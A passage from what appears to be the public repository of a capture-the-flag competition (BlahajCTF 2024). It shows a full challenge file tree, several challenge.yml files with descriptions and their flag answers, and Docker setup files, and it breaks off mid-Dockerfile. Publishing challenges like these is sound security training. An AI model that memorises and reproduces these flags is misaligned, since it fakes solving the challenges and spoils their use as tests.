├── .gitignore ├── Challenges ├── Crypto │ ├── EZpz │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── main.sage │ │ ├── sol │ │ │ └── solve.sage │ │ └── src │ │ │ └── main.sage │ ├── OneShot │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── OneShot.py │ │ ├── sol │ │ │ ├── solution.md │ │ │ ├── solver.py │ │ │ └── symbolic_mersenne_cracker.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ └── server.py │ ├── README.md │ ├── beginner_lcg │ │ ├── dist │ │ │ └── chal.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ └── docker-compose.yml │ ├── beginner_rc4 │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ └── sol │ │ │ └── sol.py │ ├── beginner_rsa │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ └── sol │ │ │ └── sol.py │ ├── bytes2long │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ └── sol │ │ │ └── sol.py │ ├── cycloLCG │ │ ├── dist │ │ │ └── chal.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ └── docker-compose.yml │ ├── ecdsa_jail │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ └── flag.txt │ │ ├── sol │ │ │ └── image.png │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ └── flag.txt │ ├── gggg │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chall.py │ │ │ └── out.sobj │ │ ├── sol │ │ │ └── sol.py │ │ └── src │ │ │ └── gen.py │ ├── long2bytes │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ └── sol │ │ │ └── sol.py │ ├── otp │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chal.py │ │ ├── solution.md │ │ ├── solve │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── pascal │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ ├── sol │ │ │ └── sol.py │ │ └── src │ │ │ └── flag.txt │ └── ycloLC │ │ ├── dist │ │ └── chal.py │ │ └── src │ │ ├── Dockerfile │ │ ├── chal.py │ │ └── docker-compose.yml ├── EXAMPLES │ ├── Executable Challenge │ │ └── christmas │ │ │ ├── challenge.yml │ │ │ ├── dist │ │ │ ├── libc.so.6 │ │ │ └── santa │ │ │ ├── sol │ │ │ ├── libc.so.6 │ │ │ ├── santa_patched │ │ │ └── solve.py │ │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── flag.txt │ │ │ ├── libc.so.6 │ │ │ ├── santa │ │ │ └── santa.c │ ├── Interactive Challenge │ │ └── Printwriter -1 │ │ │ ├── challenge.yml │ │ │ ├── dist │ │ │ └── main.py │ │ │ ├── sol │ │ │ └── solution.md │ │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── flag.txt │ │ │ └── main.py │ └── Server Challenge │ │ └── eXample Sending Service │ │ ├── challenge.yml │ │ ├── dist │ │ ├── Dockerfile │ │ ├── admin │ │ │ └── admin.js │ │ ├── app.js │ │ ├── flag.txt │ │ ├── package-lock.json │ │ ├── package.json │ │ └── views │ │ │ ├── index.ejs │ │ │ └── view_message.ejs │ │ ├── sol │ │ └── solution.md │ │ └── src │ │ ├── Dockerfile │ │ ├── admin │ │ └── admin.js │ │ ├── app.js │ │ ├── flag.txt │ │ ├── package-lock.json │ │ ├── package.json │ │ └── views │ │ ├── index.ejs │ │ └── view_message.ejs ├── Forensics │ ├── README.md │ ├── audiofile │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chal.wav │ │ └── solution.md │ ├── bigzip │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chal.zip │ │ ├── solution.md │ │ └── solution │ │ │ └── soln.py │ ├── corruptedimage │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── fix_me.jpg │ │ ├── solution.md │ │ └── solution │ │ │ └── untitled.png │ ├── dataexpunged │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── exfiltrated.pdf │ │ └── solution.md │ ├── imetthedata │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── flag.jpg │ │ └── solution.md │ ├── keylogger │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── log.pcapng │ │ └── solution.md │ ├── memory │ │ ├── challenge.yml │ │ └── solution.md │ ├── significantbites │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── bad_apple.PNG │ │ └── solution.md │ ├── trashcanstroll │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── silly.jpg │ │ └── solution.md │ └── wireshonk │ │ ├── challenge.yml │ │ └── solution.md ├── Misc │ ├── 1110101111011010 │ │ ├── challenege.yml │ │ ├── dist │ │ │ └── secret.wav │ │ ├── sol.md │ │ ├── solve │ │ │ └── solve.py │ │ └── src │ │ │ └── encoder.py │ ├── README.md │ ├── Shikanoko │ │ ├── README.md │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── .gitignore │ │ │ ├── README.md │ │ │ ├── next.config.mjs │ │ │ ├── package-lock.json │ │ │ ├── package.json │ │ │ ├── public │ │ │ │ ├── favicon.ico │ │ │ │ ├── next.svg │ │ │ │ ├── thumbnail.png │ │ │ │ └── vercel.svg │ │ │ ├── src │ │ │ │ └── app │ │ │ │ │ ├── components │ │ │ │ │ ├── Footer.tsx │ │ │ │ │ ├── MarkovChain.css │ │ │ │ │ └── MarkovChain.tsx │ │ │ │ │ ├── layout.tsx │ │ │ │ │ ├── page.tsx │ │ │ │ │ └── styles │ │ │ │ │ └── globals.css │ │ │ └── tsconfig.json │ │ ├── sol │ │ │ ├── index.js │ │ │ ├── package-lock.json │ │ │ └── package.json │ │ └── src │ │ │ ├── .gitignore │ │ │ ├── Dockerfile │ │ │ ├── README.md │ │ │ ├── docker-compose.yml │ │ │ ├── next.config.mjs │ │ │ ├── package-lock.json │ │ │ ├── package.json │ │ │ ├── public │ │ │ ├── favicon.ico │ │ │ ├── next.svg │ │ │ ├── thumbnail.png │ │ │ └── vercel.svg │ │ │ ├── src │ │ │ └── app │ │ │ │ ├── components │ │ │ │ ├── Footer.tsx │ │ │ │ ├── MarkovChain.css │ │ │ │ └── MarkovChain.tsx │ │ │ │ ├── layout.tsx │ │ │ │ ├── page.tsx │ │ │ │ └── styles │ │ │ │ └── globals.css │ │ │ └── tsconfig.json │ ├── castingspells │ │ ├── challenge.yml │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── main.py │ ├── jigsawpuzzle │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── jigsaw.py │ │ │ └── puzzle.png │ │ └── sol │ │ │ ├── part1.png │ │ │ ├── part1.py │ │ │ ├── solve.md │ │ │ └── solve.py │ ├── modelanswer │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── ai.h5 │ │ │ └── server.py │ │ ├── solution.md │ │ ├── solve │ │ │ ├── ai.h5 │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── ai.h5 │ │ │ ├── chal.py │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── requirements.txt │ ├── modelanswer2 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── models.zip │ │ │ └── trainer.py │ │ ├── soln │ │ │ └── solution.py │ │ └── solution.md │ ├── one_call_away │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── jail.py │ │ ├── solution.md │ │ ├── solve │ │ │ └── s.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── entry.sh │ │ │ ├── flag.txt │ │ │ └── jail.py │ ├── scanme │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── image.png │ │ └── solution.md │ └── shellcraft_shenanigans │ │ ├── challenge.yml │ │ ├── dist │ │ └── chall │ │ ├── sol.md │ │ ├── solve │ │ └── solve.py │ │ └── src │ │ ├── Dockerfile │ │ ├── chall │ │ ├── chall.c │ │ ├── docker-compose.yml │ │ └── flag.txt ├── Osint │ ├── README.md │ ├── bad coder │ │ ├── challenge.yml │ │ └── solution.md │ └── mrt │ │ ├── challenge.yml │ │ └── dist │ │ └── mrt.jpg ├── Pwn │ ├── 2wrongsDontMakeARight │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── vuln │ │ ├── irrelevant │ │ │ ├── vuln │ │ │ └── vuln.c │ │ ├── solve │ │ │ └── exploit.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── buildx │ │ │ ├── docker-compose.yml │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── vuln │ ├── Feedback Simulator │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── program │ │ ├── solve │ │ │ └── solve.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── program │ ├── README.md │ ├── babycpp │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.cpp │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.cpp │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── babyoverflow │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── enotes │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── enotes │ │ │ ├── enotes.c │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ │ ├── soln │ │ │ ├── enotes │ │ │ ├── libc.so.6 │ │ │ └── soln.py │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── app.py │ │ │ ├── docker-compose.yml │ │ │ ├── enotes │ │ │ ├── enotes.c │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ ├── notepad │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── sol.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── flag.txt │ ├── notepad2 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ ├── onewrite │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ ├── password │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── flag.txt │ ├── pwn100 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── pwn101 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── pwn201 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── flag.txt │ └── speed │ │ ├── challenge.yml │ │ ├── soln │ │ └── auto.py │ │ ├── solution.md │ │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ └── requirements.txt ├── README.md ├── Rev │ ├── README.md │ ├── areyouarobot │ │ ├── challenge.yml │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── bg.png │ │ │ ├── captcha.ps1 │ │ │ ├── docker-compose.yml │ │ │ ├── favicon.ico │ │ │ ├── index.html │ │ │ └── logo.png │ ├── assembly │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── challenge.s │ │ └── solution.md │ ├── badbreaking │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── breaking │ │ └── solution.md │ ├── blahajcryptor │ │ ├── challenge.yml │ │ ├── sol.md │ │ └── src │ │ │ ├── 3Ff3i1QcR3WacYRgj2hmmqkdUykWRqFCKxY3QtDL8ET7.exe │ │ │ ├── 5nhEj7fnwcBvrMbm8RdeJoiWo28isUqL7BhS4bRneB1m.exe │ │ │ ├── 7cgjCgUBZzcggXtLpwxY7ek2PD9dy8Y3ymEuFobwyTsh.exe │ │ │ ├── B7HBaDA3US8dDNZ34icgNWnpBYZJvciqJp1hy8f9G6zF.exe │ │ │ ├── Dockerfile │ │ │ ├── G8KZoPuDgADZSyzNZn9TfUJqHM3xokdQ5ZN6yd3chJ9T.exe │ │ │ ├── README.md │ │ │ ├── docker-compose.yml │ │ │ ├── eLo8wXAbf8LJZxSTy8tTonPQx76L6edq1xj4KrgPGYj.exe │ │ │ ├── entry.sh │ │ │ ├── main.py │ │ │ └── nG9EwmiYqaCEbntFkrMLgUpYCzND2tVDGzPR5XRfJbs.exe │ ├── blahajos │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── boot.asm │ │ │ └── os.img │ │ └── solution.md │ ├── clubclassics │ │ ├── challenge.yml │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── index.html │ │ │ ├── module.js │ │ │ └── module.wasm │ ├── covfefe │ │ ├── challenge.yml │ │ └── dist │ │ │ └── Covfefe.jar │ ├── crackme2 │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── crackme2 │ │ └── solution.md │ ├── funnycats │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── .gitignore │ │ │ ├── funny_cat_1.bmp │ │ │ ├── funny_cat_2.bmp │ │ │ ├── funny_cat_3.bmp │ │ │ └── main │ │ └── solution.md │ ├── iloveyou │ │ ├── challenge.yml │ │ └── dist │ │ │ └── LOVE_LETTER_FOR_YOU.doc │ ├── lookma │ │ ├── challenge.yml │ │ └── dist │ │ │ └── challenge.py │ ├── powerfulshell │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chal.ps1 │ │ └── solution.md │ ├── smuay │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── smuay │ │ └── sol │ │ │ └── smuay.i64 │ ├── timeandplace │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── dist.zip │ │ └── solution.md │ └── unsafepdf │ │ ├── challenge.yml │ │ └── dist │ │ └── silly_document.pdf └── Web │ ├── README.md │ ├── SSTIgolf │ ├── challenge.yml │ ├── dist │ │ └── dist.zip │ ├── sol.md │ ├── solve │ │ └── solve.py │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── flag.txt │ │ ├── requirements.txt │ │ ├── static │ │ └── images │ │ │ └── golf.jpg │ │ └── templates │ │ └── index.html │ ├── babysql │ ├── challenge.yml │ ├── sol.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── database.db │ │ ├── docker-compose.yml │ │ ├── init_db.py │ │ ├── requirements.txt │ │ ├── schema.sql │ │ ├── static │ │ └── css │ │ │ └── style.css │ │ └── templates │ │ ├── admin.html │ │ ├── adminlogin.html │ │ ├── index.html │ │ ├── login.html │ │ ├── product.html │ │ ├── register.html │ │ └── user.html │ ├── babyssti │ ├── challenge.yml │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── flag.txt │ │ ├── requirements.txt │ │ └── templates │ │ └── index.html │ ├── calculator │ ├── challenge.yml │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── requirements.txt │ │ └── templates │ │ ├── bug_report.html │ │ ├── index.html │ │ └── result.html │ ├── compressor │ ├── challenge.yml │ ├── soln │ │ └── soln.py │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── index.htm │ │ ├── requirements.txt │ │ └── secretflag.txt │ ├── fanpage │ ├── challenge.yml │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ └── requirements.txt │ ├── insecurecontent │ ├── challenge.yml │ ├── dist │ │ ├── admin.js │ │ └── app.py │ ├── sol.md │ └── src │ │ ├── Dockerfile │ │ ├── admin.js │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── package-lock.json │ │ ├── package.json │ │ └── requirements.txt │ ├── johndoe │ ├── challenge.yml │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ └── requirements.txt │ ├── pkiller │ ├── challenge.yml │ ├── dist │ │ └── chal.php │ ├── soln │ │ └── soln.php │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ └── src │ │ ├── .htaccess │ │ ├── 000-default.conf │ │ ├── flag.txt │ │ ├── index.php │ │ └── ports.conf │ ├── screenshooter │ ├── challenge.yml │ ├── dist │ │ ├── app.py │ │ └── requirements.txt │ ├── soln │ │ └── soln.py │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── flags │ │ ├── fakeflag1.txt │ │ ├── fakeflag10.txt │ │ ├── fakeflag100.txt │ │ ├── fakeflag11.txt │ │ ├── fakeflag12.txt │ │ ├── fakeflag13.txt │ │ ├── fakeflag14.txt │ │ ├── fakeflag15.txt │ │ ├── fakeflag16.txt │ │ ├── fakeflag17.txt │ │ ├── fakeflag18.txt │ │ ├── fakeflag19.txt │ │ ├── fakeflag2.txt │ │ ├── fakeflag20.txt │ │ ├── fakeflag21.txt │ │ ├── fakeflag22.txt │ │ ├── fakeflag23.txt │ │ ├── fakeflag24.txt │ │ ├── fakeflag25.txt │ │ ├── fakeflag26.txt │ │ ├── fakeflag27.txt │ │ ├── fakeflag28.txt │ │ ├── fakeflag29.txt │ │ ├── fakeflag3.txt │ │ ├── fakeflag30.txt │ │ ├── fakeflag31.txt │ │ ├── fakeflag32.txt │ │ ├── fakeflag33.txt │ │ ├── fakeflag34.txt │ │ ├── fakeflag35.txt │ │ ├── fakeflag36.txt │ │ ├── fakeflag37.txt │ │ ├── fakeflag38.txt │ │ ├── fakeflag39.txt │ │ ├── fakeflag4.txt │ │ ├── fakeflag40.txt │ │ ├── fakeflag41.txt │ │ ├── fakeflag42.txt │ │ ├── fakeflag43.txt │ │ ├── fakeflag44.txt │ │ ├── fakeflag45.txt │ │ ├── fakeflag46.txt │ │ ├── fakeflag47.txt │ │ ├── fakeflag48.txt │ │ ├── fakeflag49.txt │ │ ├── fakeflag5.txt │ │ ├── fakeflag50.txt │ │ ├── fakeflag51.txt │ │ ├── fakeflag52.txt │ │ ├── fakeflag53.txt │ │ ├── fakeflag54.txt │ │ ├── fakeflag55.txt │ │ ├── fakeflag56.txt │ │ ├── fakeflag57.txt │ │ ├── fakeflag58.txt │ │ ├── fakeflag59.txt │ │ ├── fakeflag6.txt │ │ ├── fakeflag60.txt │ │ ├── fakeflag61.txt │ │ ├── fakeflag62.txt │ │ ├── fakeflag63.txt │ │ ├── fakeflag64.txt │ │ ├── fakeflag65.txt │ │ ├── fakeflag66.txt │ │ ├── fakeflag67.txt │ │ ├── fakeflag68.txt │ │ ├── fakeflag69.txt │ │ ├── fakeflag7.txt │ │ ├── fakeflag70.txt │ │ ├── fakeflag71.txt │ │ ├── fakeflag72.txt │ │ ├── fakeflag73.txt │ │ ├── fakeflag74.txt │ │ ├── fakeflag75.txt │ │ ├── fakeflag76.txt │ │ ├── fakeflag77.txt │ │ ├── fakeflag78.txt │ │ ├── fakeflag79.txt │ │ ├── fakeflag8.txt │ │ ├── fakeflag80.txt │ │ ├── fakeflag81.txt │ │ ├── fakeflag82.txt │ │ ├── fakeflag83.txt │ │ ├── fakeflag84.txt │ │ ├── fakeflag85.txt │ │ ├── fakeflag86.txt │ │ ├── fakeflag87.txt │ │ ├── fakeflag88.txt │ │ ├── fakeflag89.txt │ │ ├── fakeflag9.txt │ │ ├── fakeflag90.txt │ │ ├── fakeflag91.txt │ │ ├── fakeflag92.txt │ │ ├── fakeflag93.txt │ │ ├── fakeflag94.txt │ │ ├── fakeflag95.txt │ │ ├── fakeflag96.txt │ │ ├── fakeflag97.txt │ │ ├── fakeflag98.txt │ │ ├── fakeflag99.txt │ │ └── theactuallyrealflag │ │ ├── requirements.txt │ │ └── templates │ │ └── index.html │ ├── securecontent │ ├── challenge.yml │ ├── dist │ │ └── app.py │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ └── requirements.txt │ ├── shark-lotto │ ├── Dockerfile │ ├── main.py │ ├── requirements.txt │ ├── static │ │ ├── blahaj.jpg │ │ ├── djungelskog.avif │ │ ├── ikea.png │ │ └── neon-cat-cute.gif │ └── templates │ │ └── slots.html │ └── userman │ ├── challenge.yml │ ├── dist │ └── chal.php │ ├── solution.md │ └── src │ ├── Dockerfile │ ├── docker-compose.yml │ └── src │ ├── .htaccess │ ├── 000-default.conf │ ├── index.php │ └── ports.conf ├── LICENSE.md └── README.md /Challenges/Crypto/EZpz/challenge.yml: -------------------------------------------------------------------------------- 1 | name: EZpz 2 | author: azazo 3 | category: crypto 4 | description: | 5 | > Seems that there were lot of smart people around last year... Well then, this challenge shouldn't be a problem, since it's EZpz. 6 | 7 | flags: 8 | - blahaj{3x73nd3D_an0Mal0u5_cURV3_a77ACK_0n_F13LD_0F_P-aD1c_nUMb3r5} -------------------------------------------------------------------------------- /Challenges/Crypto/OneShot/challenge.yml: -------------------------------------------------------------------------------- 1 | name: OneShot 2 | author: OwOverflow! 3 | category: crypto 4 | description: | 5 | > The glitch is spreading across the world, corrupting the bits needed to decrypt the key. The world machine needs your help! 6 | 7 | # The flag to use 8 | flags: 9 | - blahaj{N1K0_02_N1C0_807H_423_CU73_N4M35} -------------------------------------------------------------------------------- /Challenges/Crypto/OneShot/sol/solution.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Crypto/OneShot/sol/solution.md -------------------------------------------------------------------------------- /Challenges/Crypto/OneShot/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # switch working directory 5 | WORKDIR /app 6 | 7 | # copy every content from the local file to the image 8 | COPY . /app 9 | 10 | EXPOSE 8000 11 | 12 | # configure the container to run in an executed manner 13 | ENTRYPOINT [ "python" ] 14 | 15 | CMD [ "server.py" ] 16 | -------------------------------------------------------------------------------- /Challenges/Crypto/README.md: -------------------------------------------------------------------------------- 1 | Crypto Challenges -------------------------------------------------------------------------------- /Challenges/Crypto/beginner_lcg/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add socat 5 | 6 | RUN pip install pycryptodome 7 | 8 | COPY ./chal.py /srv/app/run.py 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python3.10 -u /srv/app/run.py\"" ] -------------------------------------------------------------------------------- /Challenges/Crypto/beginner_lcg/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | beginner-lcg: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Crypto/beginner_rc4/challenge.yml: -------------------------------------------------------------------------------- 1 | name: beginner_stream 2 | author: warri 3 | category: crypto 4 | description: 5 | I was inspired by the internals of RC4 and made this custom stream cipher! 6 | This challenge has added comments to help ease one into the world of slightly harder cryptos! 7 | 8 | flags: 9 | - blahaj{d0nt_m4k3_y0ur_st4te_4a5y_t0_r3c0ver!} -------------------------------------------------------------------------------- /Challenges/Crypto/beginner_rsa/challenge.yml: -------------------------------------------------------------------------------- 1 | name: beginner_rsa 2 | author: warri 3 | category: crypto 4 | description: RSA is hard when the factorisation of n is unknown. Would this be enough to break it? 5 | 6 | flags: 7 | - blahaj{eqns_and_rsa_make_a_fine_couple} -------------------------------------------------------------------------------- /Challenges/Crypto/bytes2long/challenge.yml: -------------------------------------------------------------------------------- 1 | name: bytes2long 2 | author: warri 3 | category: crypto 4 | description: Let's start off with simple bytes to int conversion! Follow the instructions in the file to get the flag 5 | 6 | flags: 7 | - blahaj{h3llo_crypt0!} -------------------------------------------------------------------------------- /Challenges/Crypto/cycloLCG/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add socat 5 | 6 | RUN pip install pycryptodome 7 | 8 | COPY ./chal.py /srv/app/run.py 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python3.10 -u /srv/app/run.py\"" ] -------------------------------------------------------------------------------- /Challenges/Crypto/cycloLCG/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | cyclolcg: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/challenge.yml: -------------------------------------------------------------------------------- 1 | name: ecdsa_jail 2 | author: warri 3 | category: crypto 4 | description: I heard jails are tough to protect, so I wrote an ECDSA algorithm such that any input code must be signed with my own private key in order for them to be executed! I heard there's a nasty CVE-2022-21449 vulnerability concerning input validation, so I made a quick patch to it! It should be secure now, right? 5 | 6 | flags: 7 | - blahaj{CVE-2022-21449_psYch1c_sigNatur3s!} -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/dist/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add python3-dev gcc musl-dev gmp-dev socat 5 | RUN pip install fastecdsa 6 | 7 | COPY ./chal.py /srv/app/run.py 8 | COPY ./flag.txt /srv/app/flag.txt 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python3.10 -u /srv/app/run.py\"" ] 14 | # docker build -t ecdsa_jail -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/dist/flag.txt: -------------------------------------------------------------------------------- 1 | enterflagdatahere -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/sol/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Crypto/ecdsa_jail/sol/image.png -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add python3-dev gcc musl-dev gmp-dev socat 5 | RUN pip install fastecdsa 6 | 7 | COPY ./chal.py /srv/app/run.py 8 | COPY ./flag.txt /srv/app/flag.txt 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python3.10 -u 